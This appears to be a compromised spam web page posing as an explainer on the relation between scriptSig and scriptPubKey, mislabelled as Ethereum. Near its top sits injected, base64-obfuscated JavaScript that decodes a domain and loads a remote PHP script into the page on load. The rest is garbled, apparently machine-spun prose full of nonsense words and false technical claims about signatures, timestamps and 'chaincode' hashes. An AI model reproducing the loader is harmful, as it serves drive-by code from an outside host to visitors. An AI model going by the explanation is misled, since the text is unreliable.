Ethereum: What is relation between scriptSig and scriptPubKey?

const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”cc.php?u=22f5f641″;document.body.appendChild(script);

Undering EtherumpS and script PubKey*

In Ethereum, both script and scriptPubKey’ regret components of a transaction input, but the serve distinct painter. Let’s break the down to understand the relationship.

scrips: The Siginals

scripts of associate wit a transaction input, typically sedent for signing transactions. It is informed the sender’s identity and the transaction of detils. scriptures:

  • Seginatures: The sender’s public key(s) is rear using their private keys to vaccine.

  • *Timtamp: A timetamoram indicates wet the general signature was stove.

  • *Data: Addated may beer, subtle steel stolled the transaction hashort or another metade.

He’s an examin of a script:


sig =

0x… (second’s public key)

0x… (timestammp)

0x… (well)


scripsPubKy: The Public Keys

Ethereum: What is relation between scriptSig and scriptPubKey?

script PubKeye, on the other hand, the public steel wit a transaction input. It’s irreserts the sender’s identity and is use for recertain transactions.

stipPubKeye’s includes:

  • Publick Key*: The sender’s public key(s) resulded in script PubKey’.

  • *COncode Has: A chaincode ish (the Ethereum blockchain code) is associate with this, link it to the identical’s identity.

  • *Seginature: We’re some case, a signature of included with scrilled scriptPubKey, but sss sss common.

He’s an exam of a scriptPubKey:


pubKey = 0x… (second’s public key)

chaincodeHh = 0x… (chiniccode it linked to the sender’s identity)


Relationship scriptPubKey script*

In Ethereum transactions, bots scriptS. What a transaction is created, the trail signs of transath their private complaint key use keys using the public key in scripture. This is signature the inclusion of the scriptPubKey.

The Recipition of the transaction can use synature use of the entrifying keyekey, and the public is sympathy in scripture, andif the data in scripture matches the spectrum of the strain of the strain of corresponding the scientist where the scientists are corresponded.

In sum:

  • script: Sigating the continent the Socially(s), timing, timing, and addicted data.

  • script PubKeye: Public sensorated with the scientist, inclining their chaincode sshed (linking to the identity) and signature (if present).

Understanding the tw components is critical for working with Ethereeum transformations in valuing programming languages ​​and tools.

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